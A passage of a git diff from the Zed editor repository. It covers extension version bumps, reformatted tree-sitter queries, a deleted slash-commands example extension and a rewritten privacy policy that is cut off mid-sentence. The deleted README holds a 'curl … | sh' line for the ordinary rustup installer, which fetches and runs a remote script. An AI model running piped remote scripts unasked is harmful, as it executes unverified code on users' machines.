@@ [package] name = "zed_html" -version = "0.3.0" +version = "0.3.1" edition.workspace = true publish.workspace = true license = "Apache-2.0" diff --git a/extensions/html/extension.toml b/extensions/html/extension.toml index 68ab0e4b9d3f56fca17cbd518d5990edc2ec711a..eb8fc1862197deaa82ffa28453dba007583411b5 100644 --- a/extensions/html/extension.toml +++ b/extensions/html/extension.toml @@ -1,7 +1,7 @@ id = "html" name = "HTML" description = "HTML support." -version = "0.3.0" +version = "0.3.1" schema_version = 1 authors = ["Isaac Clayton "] repository = "https://github.com/zed-industries/zed" diff --git a/extensions/html/languages/html/brackets.scm b/extensions/html/languages/html/brackets.scm index adc11a1d7408ae33b80f0daa78a03d8f3352b745..02619c109f3ff2d830948e8e8c4889e1e733fae9 100644 --- a/extensions/html/languages/html/brackets.scm +++ b/extensions/html/languages/html/brackets.scm @@ -2,11 +2,11 @@ "/>" @close) (#set! rainbow.exclude)) -(("" @close) (#set! rainbow.exclude)) -(("<" @open +(("" @close) (#set! rainbow.exclude)) diff --git a/extensions/html/languages/html/highlights.scm b/extensions/html/languages/html/highlights.scm index bb3b43e813929de705605e3ecc3e0b1052c48297..21bf193cf346313024ba8df6e7457c785e21476e 100644 --- a/extensions/html/languages/html/highlights.scm +++ b/extensions/html/languages/html/highlights.scm @@ -1,12 +1,17 @@ (tag_name) @tag + (doctype) @tag.doctype + (attribute_name) @attribute + [ "\"" "'" (attribute_value) ] @string + (comment) @comment + (entity) @string.special "=" @punctuation.delimiter.html diff --git a/extensions/html/languages/html/indents.scm b/extensions/html/languages/html/indents.scm index 436663dba3e1993c84e151f09c581844fdcb977a..6e5bf97d4c3edeb251cdcffdaf6c9f9659d39849 100644 --- a/extensions/html/languages/html/indents.scm +++ b/extensions/html/languages/html/indents.scm @@ -1,5 +1,8 @@ -(start_tag ">" @end) @indent -(self_closing_tag "/>" @end) @indent +(start_tag + ">" @end) @indent + +(self_closing_tag + "/>" @end) @indent (element (start_tag) @start diff --git a/extensions/html/languages/html/injections.scm b/extensions/html/languages/html/injections.scm index 525b3efe29dca541afc8829dd41ff217f48439c3..e9c2c98155768fdee9a4fcefe672bebf7d4ce8f4 100644 --- a/extensions/html/languages/html/injections.scm +++ b/extensions/html/languages/html/injections.scm @@ -1,6 +1,5 @@ ((comment) @injection.content - (#set! injection.language "comment") -) + (#set! injection.language "comment")) (script_element (raw_text) @injection.content @@ -11,11 +10,15 @@ (#set! injection.language "css")) (attribute - (attribute_name) @_attribute_name (#match? @_attribute_name "^style$") - (quoted_attribute_value (attribute_value) @injection.content) - (#set! injection.language "css")) + (attribute_name) @_attribute_name + (#match? @_attribute_name "^style$") + (quoted_attribute_value + (attribute_value) @injection.content) + (#set! injection.language "css")) (attribute - (attribute_name) @_attribute_name (#match? @_attribute_name "^on[a-z]+$") - (quoted_attribute_value (attribute_value) @injection.content) - (#set! injection.language "javascript")) + (attribute_name) @_attribute_name + (#match? @_attribute_name "^on[a-z]+$") + (quoted_attribute_value + (attribute_value) @injection.content) + (#set! injection.language "javascript")) diff --git a/extensions/html/languages/html/overrides.scm b/extensions/html/languages/html/overrides.scm index 434f610e70242be8589a9f58cc7fd4704d5d9296..3e9e499e5c95b960e7ec9fe4e46bb078b8043092 100644 --- a/extensions/html/languages/html/overrides.scm +++ b/extensions/html/languages/html/overrides.scm @@ -1,4 +1,5 @@ (comment) @comment + (quoted_attribute_value) @string [ diff --git a/extensions/html/src/html.rs b/extensions/html/src/html.rs index 337689ebddd427769ab985ad82512f76b601e67c..a5e38c97b3613ca735fb4eea8f26472ab3f66049 100644 --- a/extensions/html/src/html.rs +++ b/extensions/html/src/html.rs @@ -95,11 +95,8 @@ impl zed::Extension for HtmlExtension { server_id: &LanguageServerId, worktree: &zed::Worktree, ) -> Result> { - let settings = LspSettings::for_worktree(server_id.as_ref(), worktree) - .ok() - .and_then(|lsp_settings| lsp_settings.settings) - .unwrap_or_default(); - Ok(Some(settings)) + LspSettings::for_worktree(server_id.as_ref(), worktree) + .map(|lsp_settings| lsp_settings.settings) } fn language_server_initialization_options( diff --git a/extensions/proto/Cargo.toml b/extensions/proto/Cargo.toml index 68a524ed944b0db1fd75b9ec5ca5e0b1aa99e89f..5ca9720e25fb7cb115004d0de7c47e45d7e6252a 100644 --- a/extensions/proto/Cargo.toml +++ b/extensions/proto/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "zed_proto" -version = "0.3.1" +version = "0.3.2" edition.workspace = true publish.workspace = true license = "Apache-2.0" diff --git a/extensions/proto/extension.toml b/extensions/proto/extension.toml index 70ebed1ca50635d9e818ce216920937a547b64c4..42985998e4dc934f9b6860ee0a5778a097d5723a 100644 --- a/extensions/proto/extension.toml +++ b/extensions/proto/extension.toml @@ -1,7 +1,7 @@ id = "proto" name = "Proto" description = "Protocol Buffers support." -version = "0.3.1" +version = "0.3.2" schema_version = 1 authors = ["Zed Industries "] repository = "https://github.com/zed-industries/zed" diff --git a/extensions/proto/languages/proto/highlights.scm b/extensions/proto/languages/proto/highlights.scm index 923e00bb1dfca30afcf41a6ab681846d8f20b900..f17c48127380a4c314f4d5b8498b16d4c9d85be6 100644 --- a/extensions/proto/languages/proto/highlights.scm +++ b/extensions/proto/languages/proto/highlights.scm @@ -52,11 +52,11 @@ "}" "<" ">" -] @punctuation.bracket +] @punctuation.bracket [ - ";" - "," + ";" + "," ] @punctuation.delimiter "=" @operator diff --git a/extensions/proto/languages/proto/indents.scm b/extensions/proto/languages/proto/indents.scm index acb44a5e1e617cc0d735228af022129c0b39d561..c096b82d2b2d6856bcb6c39bf44212507b605e38 100644 --- a/extensions/proto/languages/proto/indents.scm +++ b/extensions/proto/languages/proto/indents.scm @@ -1,3 +1,11 @@ -(_ "{" "}" @end) @indent -(_ "[" "]" @end) @indent -(_ "(" ")" @end) @indent +(_ + "{" + "}" @end) @indent + +(_ + "[" + "]" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/extensions/proto/languages/proto/injections.scm b/extensions/proto/languages/proto/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/extensions/proto/languages/proto/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/extensions/proto/languages/proto/outline.scm b/extensions/proto/languages/proto/outline.scm index f90b1bae33effade920bf8f2c76d7f2d187f1d8e..f0aa6eff9801cdbfe8f61395901cfb96806e10a7 100644 --- a/extensions/proto/languages/proto/outline.scm +++ b/extensions/proto/languages/proto/outline.scm @@ -1,19 +1,19 @@ (message - "message" @context - (message_name - (identifier) @name)) @item + "message" @context + (message_name + (identifier) @name)) @item (service - "service" @context - (service_name - (identifier) @name)) @item + "service" @context + (service_name + (identifier) @name)) @item (rpc - "rpc" @context - (rpc_name - (identifier) @name)) @item + "rpc" @context + (rpc_name + (identifier) @name)) @item (enum - "enum" @context - (enum_name - (identifier) @name)) @item + "enum" @context + (enum_name + (identifier) @name)) @item diff --git a/extensions/proto/languages/proto/textobjects.scm b/extensions/proto/languages/proto/textobjects.scm index 90ea84282da39df8a2023108c367c3ef76a0ef9a..7e859c0d65bd5d119b616d626f3d88ee6d1fc6ee 100644 --- a/extensions/proto/languages/proto/textobjects.scm +++ b/extensions/proto/languages/proto/textobjects.scm @@ -1,17 +1,21 @@ -(message (message_body +(message + (message_body "{" (_)* @class.inside "}")) @class.around -(enum (enum_body + +(enum + (enum_body "{" (_)* @class.inside "}")) @class.around + (service - "service" - (_) - "{" - (_)* @class.inside - "}") @class.around + "service" + (_) + "{" + (_)* @class.inside + "}") @class.around (rpc) @function.around diff --git a/extensions/slash-commands-example/Cargo.toml b/extensions/slash-commands-example/Cargo.toml deleted file mode 100644 index 03b22af254ab3190f2dbfca04976c89b9a37e995..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/Cargo.toml +++ /dev/null @@ -1,16 +0,0 @@ -[package] -name = "slash_commands_example" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "Apache-2.0" - -[lints] -workspace = true - -[lib] -path = "src/slash_commands_example.rs" -crate-type = ["cdylib"] - -[dependencies] -zed_extension_api = "0.1.0" diff --git a/extensions/slash-commands-example/README.md b/extensions/slash-commands-example/README.md deleted file mode 100644 index 8c16a4e168a3334d3197090837eeaf21c956b3c3..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/README.md +++ /dev/null @@ -1,84 +0,0 @@ -# Slash Commands Example Extension - -This is an example extension showcasing how to write slash commands. - -See: [Extensions: Slash Commands](https://zed.dev/docs/extensions/slash-commands) in the Zed Docs. - -## Pre-requisites - -[Install Rust Toolchain](https://www.rust-lang.org/tools/install): - -```sh -curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -``` - -## Setup - -```sh -git clone https://github.com/zed-industries/zed.git -cp -RL zed/extensions/slash-commands-example . - -cd slash-commands-example/ - -# Update Cargo.toml to make it standalone -cat > Cargo.toml << EOF -[package] -name = "slash_commands_example" -version = "0.1.0" -edition = "2021" -license = "Apache-2.0" - -[lib] -path = "src/slash_commands_example.rs" -crate-type = ["cdylib"] - -[dependencies] -zed_extension_api = "0.1.0" -EOF - -curl -O https://raw.githubusercontent.com/rust-lang/rust/master/LICENSE-APACHE -echo "# Zed Slash Commands Example Extension" > README.md -echo "Cargo.lock" > .gitignore -echo "target/" >> .gitignore -echo "*.wasm" >> .gitignore - -git init -git add . -git commit -m "Initial commit" - -cd .. -mv slash-commands-example MY-SUPER-COOL-ZED-EXTENSION -zed $_ -``` - -## Installation - -1. Open the command palette (`cmd-shift-p` or `ctrl-shift-p`). -2. Launch `zed: install dev extension` -3. Select the extension folder created above - -## Test - -Open the assistant and type `/echo` and `/pick-one` at the beginning of a line. - -## Customization - -Open the `extensions.toml` file and set the `id`, `name`, `description`, `authors` and `repository` fields. - -Rename `slash-commands-example.rs` you'll also have to update `Cargo.toml` - -## Rebuild - -Rebuild to see these changes reflected: - -1. Open Zed Extensions (`cmd-shift-x` or `ctrl-shift-x`). -2. Click `Rebuild` next to your Dev Extension (formerly "Slash Command Example") - -## Troubleshooting / Logs - -- [zed.dev docs: Troubleshooting](https://zed.dev/docs/troubleshooting) - -## Documentation - -- [zed.dev docs: Extensions: Developing Extensions](https://zed.dev/docs/extensions/developing-extensions) -- [zed.dev docs: Extensions: Slash Commands](https://zed.dev/docs/extensions/slash-commands) diff --git a/extensions/slash-commands-example/extension.toml b/extensions/slash-commands-example/extension.toml deleted file mode 100644 index 888c776d0111bdc5f99e87967f0cff6e0c91b2b3..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/extension.toml +++ /dev/null @@ -1,15 +0,0 @@ -id = "slash-commands-example" -name = "Slash Commands Example" -description = "An example extension showcasing slash commands." -version = "0.1.0" -schema_version = 1 -authors = ["Zed Industries "] -repository = "https://github.com/zed-industries/zed" - -[slash_commands.echo] -description = "echoes the provided input" -requires_argument = true - -[slash_commands.pick-one] -description = "pick one of three options" -requires_argument = true diff --git a/extensions/slash-commands-example/src/slash_commands_example.rs b/extensions/slash-commands-example/src/slash_commands_example.rs deleted file mode 100644 index 5b170d63ee38c4dd173ddc2856c858755150490e..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/src/slash_commands_example.rs +++ /dev/null @@ -1,90 +0,0 @@ -use zed_extension_api::{ - self as zed, SlashCommand, SlashCommandArgumentCompletion, SlashCommandOutput, - SlashCommandOutputSection, Worktree, -}; - -struct SlashCommandsExampleExtension; - -impl zed::Extension for SlashCommandsExampleExtension { - fn new() -> Self { - SlashCommandsExampleExtension - } - - fn complete_slash_command_argument( - &self, - command: SlashCommand, - _args: Vec, - ) -> Result, String> { - match command.name.as_str() { - "echo" => Ok(vec![]), - "pick-one" => Ok(vec![ - SlashCommandArgumentCompletion { - label: "Option One".to_string(), - new_text: "option-1".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Two".to_string(), - new_text: "option-2".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Three".to_string(), - new_text: "option-3".to_string(), - run_command: true, - }, - ]), - command => Err(format!("unknown slash command: \"{command}\"")), - } - } - - fn run_slash_command( - &self, - command: SlashCommand, - args: Vec, - _worktree: Option<&Worktree>, - ) -> Result { - match command.name.as_str() { - "echo" => { - if args.is_empty() { - return Err("nothing to echo".to_string()); - } - - let text = args.join(" "); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - range: (0..text.len()).into(), - label: "Echo".to_string(), - }], - text, - }) - } - "pick-one" => { - let Some(selection) = args.first() else { - return Err("no option selected".to_string()); - }; - - match selection.as_str() { - "option-1" | "option-2" | "option-3" => {} - invalid_option => { - return Err(format!("{invalid_option} is not a valid option")); - } - } - - let text = format!("You chose {selection}."); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - range: (0..text.len()).into(), - label: format!("Pick One: {selection}"), - }], - text, - }) - } - command => Err(format!("unknown slash command: \"{command}\"")), - } - } -} - -zed::register_extension!(SlashCommandsExampleExtension); diff --git a/extensions/test-extension/languages/gleam/highlights.scm b/extensions/test-extension/languages/gleam/highlights.scm index 4b85b88d0151a1bfe9018f0c526497261d6e1801..50de3a6acbe6a8b65340d288334aa7185afc8609 100644 --- a/extensions/test-extension/languages/gleam/highlights.scm +++ b/extensions/test-extension/languages/gleam/highlights.scm @@ -1,6 +1,8 @@ ; Comments (module_comment) @comment + (statement_comment) @comment + (comment) @comment ; Constants @@ -9,43 +11,61 @@ ; Variables (identifier) @variable + (discard) @comment.unused ; Modules (module) @module -(import alias: (identifier) @module) + +(import + alias: (identifier) @module) + (remote_type_identifier module: (identifier) @module) + (remote_constructor_name module: (identifier) @module) + ((field_access record: (identifier) @module field: (label) @function) - (#is-not? local)) + (#is-not? local)) ; Functions -(unqualified_import (identifier) @function) -(unqualified_import "type" (type_identifier) @type) -(unqualified_import (type_identifier) @constructor) +(unqualified_import + (identifier) @function) + +(unqualified_import + "type" + (type_identifier) @type) + +(unqualified_import + (type_identifier) @constructor) + (function name: (identifier) @function) + (external_function name: (identifier) @function) + (function_parameter name: (identifier) @variable.parameter) + ((function_call - function: (identifier) @function) - (#is-not? local)) + function: (identifier) @function) + (#is-not? local)) + ((binary_expression - operator: "|>" - right: (identifier) @function) - (#is-not? local)) + operator: "|>" + right: (identifier) @function) + (#is-not? local)) ; "Properties" ; Assumed to be intended to refer to a name for a field; something that comes ; before ":" or after "." ; e.g. record field names, tuple indices, names for named arguments, etc (label) @property + (tuple_access index: (integer) @property) @@ -54,10 +74,12 @@ "@" @attribute name: (identifier) @attribute) -(attribute_value (identifier) @constant) +(attribute_value + (identifier) @constant) ; Type names (remote_type_identifier) @type + (type_identifier) @type ; Data constructors @@ -65,19 +87,24 @@ ; Literals (string) @string + ((escape_sequence) @warning - ; Deprecated in v0.33.0-rc2: - (#eq? @warning "\\e")) + ; Deprecated in v0.33.0-rc2: + (#eq? @warning "\\e")) + (escape_sequence) @string.escape + (bit_string_segment_option) @function.builtin + (integer) @number + (float) @number ; Reserved identifiers ; TODO: when tree-sitter supports `#any-of?` in the Rust bindings, ; refactor this to use `#any-of?` rather than `#match?` ((identifier) @warning - (#match? @warning "^(auto|delegate|derive|else|implement|macro|test|echo)$")) + (#match? @warning "^(auto|delegate|derive|else|implement|macro|test|echo)$")) ; Keywords [ @@ -102,8 +129,12 @@ ; Operators (binary_expression operator: _ @operator) -(boolean_negation "!" @operator) -(integer_negation "-" @operator) + +(boolean_negation + "!" @operator) + +(integer_negation + "-" @operator) ; Punctuation [ @@ -116,10 +147,11 @@ "<<" ">>" ] @punctuation.bracket + [ "." "," - ;; Controversial -- maybe some are operators? + ; Controversial -- maybe some are operators? ":" "#" "=" diff --git a/extensions/test-extension/languages/gleam/indents.scm b/extensions/test-extension/languages/gleam/indents.scm index 112b414aa45f277138d0c681851129a608ee96e0..92f1a04d86d34d60763cceb872c5ac1004ba4601 100644 --- a/extensions/test-extension/languages/gleam/indents.scm +++ b/extensions/test-extension/languages/gleam/indents.scm @@ -1,3 +1,11 @@ -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/extensions/test-extension/languages/gleam/outline.scm b/extensions/test-extension/languages/gleam/outline.scm index 5df7a6af800e8e3c9f0b00834576f2e059bd12b0..2d1a7d800fb9c662f41a0a865e492716b876f2fd 100644 --- a/extensions/test-extension/languages/gleam/outline.scm +++ b/extensions/test-extension/languages/gleam/outline.scm @@ -1,31 +1,31 @@ (external_type - (visibility_modifier)? @context - "type" @context - (type_name) @name) @item + (visibility_modifier)? @context + "type" @context + (type_name) @name) @item (type_definition - (visibility_modifier)? @context - (opacity_modifier)? @context - "type" @context - (type_name) @name) @item + (visibility_modifier)? @context + (opacity_modifier)? @context + "type" @context + (type_name) @name) @item (data_constructor - (constructor_name) @name) @item + (constructor_name) @name) @item (data_constructor_argument - (label) @name) @item + (label) @name) @item (type_alias - (visibility_modifier)? @context - "type" @context - (type_name) @name) @item + (visibility_modifier)? @context + "type" @context + (type_name) @name) @item (function - (visibility_modifier)? @context - "fn" @context - name: (_) @name) @item + (visibility_modifier)? @context + "fn" @context + name: (_) @name) @item (constant - (visibility_modifier)? @context - "const" @context - name: (_) @name) @item + (visibility_modifier)? @context + "const" @context + name: (_) @name) @item diff --git a/flake.lock b/flake.lock index ce974047d69a0c752fbc729448c24ddfc170ae77..c32629aedd533082e43ea3667f1b9cdc6dccfd1b 100644 --- a/flake.lock +++ b/flake.lock @@ -79,11 +79,11 @@ ] }, "locked": { - "lastModified": 1770001842, - "narHash": "sha256-ZAyTeILfdWwDp1nuF0RK3McBduMi49qnJvrS+3Ezpac=", + "lastModified": 1775013181, + "narHash": "sha256-zPrt6oNM1r/RO5bWYaZ3hthfG9vzkr6kQdoqDd5x4Qw=", "owner": "oxalica", "repo": "rust-overlay", - "rev": "5018343419ea808f8a413241381976b7e60951f2", + "rev": "e8046c1d9ccadd497c2344d8fa49dab62f22f7be", "type": "github" }, "original": { diff --git a/legal/privacy-policy.md b/legal/privacy-policy.md index eaf8ece78160e7f643b1fd646e42a71432aafbd0..1eacc5273c93f5035579a72fe5241beca7e3718f 100644 --- a/legal/privacy-policy.md +++ b/legal/privacy-policy.md @@ -3,266 +3,178 @@ title: Privacy Policy slug: privacy-policy --- -At Zed Industries, Inc. ("Zed", "Company" or "we"), we take privacy and the security of data seriously. This Privacy Policy is established to help advise you about how we treat your personal data. By using or accessing our website located at zed.dev, or the Solution or services available pursuant the Zed End User Terms located at [https://zed.dev/terms](https://zed.dev/terms) (collectively, the "Services"), you acknowledge awareness of the practices and policies outlined below, and hereby consent that we will collect, use, and share your personal data as described in this Privacy Policy. +**Last Updated**: March 2, 2026 -As we grow and expand our Services, we may modify this Privacy Policy from time to time. When material modifications are made, we will alert you to any such changes by placing a notice on the Company website, by sending you an email and/or by some other means. Please note that if you've opted not to receive legal notice emails from us (or haven't provided us with a valid email address), those legal notices will still govern your use of the Services. If you use the Services after any changes to the Privacy Policy have been published on our website, you consent and agree to all of the changes. +## Summary -## What this Privacy Policy Covers +Zed collects user information (name, email, username, IP address, etc.), device and usage data, and web analytics to improve our products and services, as well as payment details if you subscribe. We do not store your source code and we process but do not store audio/video/screenshare from collaboration sessions. -Our Privacy Policy covers how we treat Personal Data that we gather when you access or use our Services. "Personal Data" means information that identifies or relates to a particular individual and includes information referred to as "personally identifiable information" or "personal information" under applicable data privacy laws, rules or regulations. Our Privacy Policy does not cover the practices of companies we don't own or control or people we don't manage. +- **We don't sell your data and we don't allow AI providers to train on it** +- **You control Zed editor telemetry** — disable it in Settings or learn more at [https://zed.dev/docs/telemetry](/telemetry) +- **We honor Global Privacy Control** (GPC) signals from your browser +- To access, correct, or delete your data, email privacy@zed.dev with subject "Privacy Request" -## Personal Data +Questions? Contact us at privacy@zed.dev. The full policy below contains complete details. -### Categories of Personal Data We Collect +## Introduction -This chart details the categories of Personal Data that we collect and have collected over the past 12 months: +This Privacy Policy explains how Zed Industries, Inc. ("**Zed**," "**we**," "**our**," or "**us**") collects, uses, and shares your personal data when you use our websites (including [https://zed.dev](https://zed.dev)), our downloadable software ("**Software**"), our subscription service ("**Service**"), or otherwise interact with us. -| Category of personal data | Examples of data we collect | Categories of third parties with whom we share this data | -| ----------------------------- | ------------------------------------------------------------- | -------------------------------------------------------- | -| Profile or contact data | First and last name
Email address
GitHub username | Cloud infrastructure providers
Analytics providers | -| IP data | IP address & derived geolocation data | Cloud infrastructure providers
Analytics providers | -| Web analytics | Interactions
Referrer
Request IDs
Statistics | Cloud infrastructure providers
Analytics providers | -| Photos, videos and recordings | Screenshots
Videos and video recordings you share with us | Cloud infrastructure providers | -| Audio, screenshare data | Audio and screen sharing during collaboration calls | Cloud infrastructure providers | +As used in this Privacy Policy, “personal data” means any information relating to an identified or identifiable individual and includes any information that constitutes "personally identifiable information," “personal data,” or "personal information" under applicable privacy or data protection laws or regulations. -Note that "collection" does not necessarily imply long-term storage. +You acknowledge the collection, use, disclosure, procedures, and other processing described in this Privacy Policy. Beyond the Privacy Policy, your use of our products and services is also subject to our Terms of Service included alongside. This Privacy Policy does not apply to the extent we process personal data in the role of a processor or service provider on behalf of our Zed Business customers. Such processing is governed by our Data Processing Agreement, available upon request. For information about the sub-processors we engage in that capacity, see [https://zed.dev/subprocessors](/subprocessors). -### Categories of Sources of Personal Data - -We collect Personal Data about you from the following categories of sources: - -#### You - -- When you provide such information directly to us. Examples include: - - When you create an account - - When you voluntarily provide information through our Services or through responses to surveys or questionnaires. - - When you send us an email or otherwise contact us. - - When you sign up to our mailing list. -- When you use our hosted Services and such information is collected automatically. Examples include: - - Cookies (defined in the "Tracking Tools and Opt-Out" section below). -- When you use the client software we provide on your machine. Examples include: - - Authentication information when you sign in. - - Version and system metadata when the software checks for updates. - - Usage data, unless you opt out. - - Crash reports, unless you opt out. - - When you make requests to language models we host for you. - - Zed does not store or train on your requests without consent. - - Other relevant data necessary to provide you with our Services. - -#### Third Parties +## Personal Data We Collect -- When you login to the service using a third-party service like GitHub. -- Information collected by content delivery networks or similar service providers -- We may use analytics providers to analyze how you interact and engage with the Services, or third parties may help us provide you with customer support. +We may collect personal data from or about you and your devices from the sources and in the manner described below. If you do not provide requested data, some features may not work - either because we need that data to deliver them, or because we're legally required to collect it. -## Our Business Purposes for Collecting or Disclosing Personal Data +For authorized users on Zed Business plans, certain data described in this section may be processed by Zed as a data processor on behalf of the Zed Business customer. In those cases, the Zed Business customer determines the purposes and lawful basis for that processing, as set forth in our Data Processing Agreement. -- Providing, Customizing and Improving the Services - - Creating and managing your account or other user profiles. - - Processing orders or other fee-based transactions; billing. - - Providing you with the products, services or information you request. - - Meeting or fulfilling the reason you provided the information to us. - - Providing support and assistance for the Services. - - Improving the Services, including testing, research, internal analytics and product development. - - Doing fraud protection, security and debugging. - - Carrying out other business purposes stated when collecting your Personal Data or as otherwise set forth in applicable data privacy laws. -- Marketing the Services - - Marketing and selling the Services. -- Corresponding with You - - Responding to correspondence that we receive from you, contacting you when necessary or requested, and sending you information about Zed or our Services. - - Sending emails and other communications according to your preferences or that display content that we think will interest you. -- Meeting Legal Requirements and Enforcing Legal Terms - - Fulfilling our legal obligations under applicable law, regulation, court order or other legal process, such as preventing, detecting and investigating security incidents and potentially illegal or prohibited activities. - - Protecting the rights, property or safety of you, Zed or another party. - - Enforcing any agreements with you. - - Responding to claims that any posting or other content violates third-party rights. - - Resolving disputes. +### Personal Data You Provide to Us -We will not collect additional categories of Personal Data or use the Personal Data we collected for materially different, unrelated or incompatible purposes without providing you notice as is described above. +- **Contact Information** - We may collect your personal data when you inquire about Zed, our products and services, or when you otherwise interact with us, including when you sign up for, attend, or take part in our demos, events, or webinars. This data may include your full name, work email, company name, company size, and any other data you share with us. -## How We Disclose Your Personal Data +- **Communications** - When you contact us directly, we may receive personal data about you, such as your name, email address, message contents and attachments, and - if you join a live collaboration session - we process, but do not store, your audio and shared screen. When you sign up for news and updates, we will collect your email address and any other data you share. When you communicate with us online, our third-party vendors may receive and store these communications on our behalf. Our emails may include tracking pixels to track information about how you interact with our emails, such as whether you open them and whether you access any included links, your approximate Location Information (described below) based on your IP address, and Device Information (described below), to improve our website, products, and services. -We disclose your Personal Data to categories of service providers and other parties listed in this section. Some of these disclosures may constitute a "sale" of your Personal Data as defined under applicable laws. For more information, please refer to the state-specific sections below. +- **Account Information** - When you create an Account with Zed, we collect the data you provide to create, update, or manage your Service account. Examples include: your name, username, and email address. -- Service Providers. These parties help us provide the Services or perform business functions on our behalf. They include: - - Hosting, technology and communication providers. - - Providers of artificial intelligence or machine learning models - - Payment processors. - - If you are using our Services on a fee-basis, our payment processing partner Stripe, Inc. ("Stripe") collects your voluntarily-provided payment card information necessary to process your payment. - - Please see Stripe Terms of Service and Stripe Privacy Policy for information on its use and storage of your Personal Data. -- Analytics Partners. These parties provide analytics on web traffic or usage of the Services. They include: - - Companies that track how users found or were referred to the Services. - - Companies that track how users interact with the Services. -- Authorized authentication providers (e.g. GitHub OAuth) +- **Careers** - If you apply for a job with us, you may submit your contact information and your resume online. We will collect any information you choose to provide on your resume, such as your contact information, education, and employment experience. -### Fulfilling Legal Obligations +- **Payment Information** - If you make a payment, your payment details, such as credit card, address, phone number, or other financial information, are collected by our third-party payment processor on our behalf. Zed does not collect, process, or store your payment information directly. -We may share any Personal Data that we collect with third parties in relation to the activities set forth under "Meeting Legal Requirements and Enforcing Legal Terms" in the "Our Business Purposes for Collecting Personal Data" section above. +- **Regarding Third-Party Services** - If you use or integrate third-party tools or link third-party services with the Software or Service, we may receive personal data about you, such as your [GitHub username and other related information](https://docs.github.com/en/apps/oauth-apps/using-oauth-apps/connecting-with-third-party-applications) that permits us to authenticate your user identity and keep your account secure. You can learn more about Zed Third Parties here: [https://zed.dev/](https://zed.dev/acceptable-use-policies)[acceptable-use-policies](/acceptable-use-policies) -### Business Transfers +### Personal Data We Collect When You Use Our Websites, Software, or Service -Personal Data collected may be transferred to a third party if we undergo a merger, acquisition, bankruptcy or other transaction in which such third party assumes control of our business (in whole or in part). In such an event, we will make reasonable efforts to notify you before your information becomes subject to different privacy and security policies and practices as authorized or mandated by applicable law. +- **Website, Software, and Service Telemetry** - We automatically collect telemetry - technical logs, metrics, and usage data - to improve and support Zed’s websites, Software, and Service. You may opt out of local telemetry collection in the Software settings. However, when you sign into or use the websites or Service (including via the Software) we collect telemetry on our servers related to use of the websites and Service. -## Data that is Not Personal Data +Learn more about telemetry and your choices and how to opt out of Software telemetry collection at [https://zed.dev/docs/telemetry](/telemetry) -We may create aggregated, de-identified or anonymized data from the Personal Data we collect, including by removing information that makes the data personally identifiable to a particular user. We may use such aggregated, de-identified or anonymized data and share it with third parties for our lawful business purposes, including to analyze, build and improve the Services and promote our business, provided that we will not share such data in a manner that could identify you. +- **Device and Location Information** - When you use the website, Software, or Service we may collect information about your device and software, including IP address (and inferred approximate location), device type, device identifiers, browser (type, version, user-agent, and language), and operating system or mobile device type. We do so to support improving and securing the Software and Service. Zed does not collect precise location information. -## Tracking Tools and Opt-Out +- **Usage Information** - We automatically collect information about how you use our website and Service, like the pages or other content you view and the dates and times of your visits. We do so to support improving and securing the websites, Software, and Service. -The Services use cookies and similar technologies such as pixel tags, web beacons, clear GIFs and JavaScript (collectively, "Cookies") to enable our servers to recognize your web browser, tell us how and when you visit and use our Services, analyze trends, learn about our user base and operate and improve our Services. Cookies are small pieces of data– usually text files – placed on your computer, tablet, phone or similar device when you use that device to access our Services. We may also supplement the information we collect from you with information received from third parties, including third parties that have placed their own Cookies on your device(s). +- **Information from Cookies and Similar Technologies** - We and our third-party partners may collect information using cookies, beacons, and similar technologies (collectively “**Cookies**”) to provide functionality and to recognize you across visits. See our [Cookie Policy](/cookie-policy), which includes information on how to control or opt out of these Cookies. -### We use the following types of Cookies: +## How We Use the Personal Data We Collect -- Essential Cookies. Essential Cookies are required for providing you with features or services that you have requested. For example, certain Cookies enable you to log into secure areas of our Services. Disabling these Cookies may make certain features and services unavailable. -- Functional Cookies. Functional Cookies are used to record your choices and settings regarding our Services, maintain your preferences over time and recognize you when you return to our Services. These Cookies help us to personalize our content for you, greet you by name and remember your preferences (for example, your choice of language or region). -- Performance/Analytical Cookies. Performance/Analytical Cookies allow us to understand how visitors use our Services. They do this by collecting information about the number of visitors to the Services, what pages visitors view on our Services and how long visitors are viewing pages on the Services. Performance/Analytical Cookies also help us measure the performance of our advertising campaigns to help us improve our campaigns and Services' content for those who engage with our advertising. +We use the personal data we collect: -You can decide whether or not to accept Cookies through your internet browser's settings. Most browsers have an option for turning off the Cookie feature, which will prevent your browser from accepting new Cookies, as well as (depending on the sophistication of your browser software) allow you to decide on acceptance of each new Cookie in a variety of ways. You can also delete all Cookies that are already on your device. If you do this, however, you may have to manually adjust some preferences every time you visit our website and some of the Services and functionalities may not work. +- To deliver and improve our products: Providing the Software and Service functionality you request, debugging issues, and developing new features based on usage patterns; -To find out more information about Cookies generally, including information about how to manage and delete Cookies, please visit [https://allaboutcookies.org/](https://allaboutcookies.org/) or [https://ico.org.uk/for-the-public/online/cookies/](https://ico.org.uk/for-the-public/online/cookies/) if you are located in the European Union. +- To communicate with you: Responding to support requests, sending service announcements, and (with your consent) marketing communications; -## Data Security +- To secure our services: Detecting and preventing fraud, abuse, and security threats; -We endeavor to protect your Personal Data from unauthorized access, use and disclosure using appropriate physical, technical, organizational and administrative security measures based on our Services,the type of Personal Data being collected and how we are processing that data. You should also help protect your data by selecting and protecting your password and/or other sign-on mechanism(s) with care; limiting access to your computer or device and browser; and signing off after you have finished 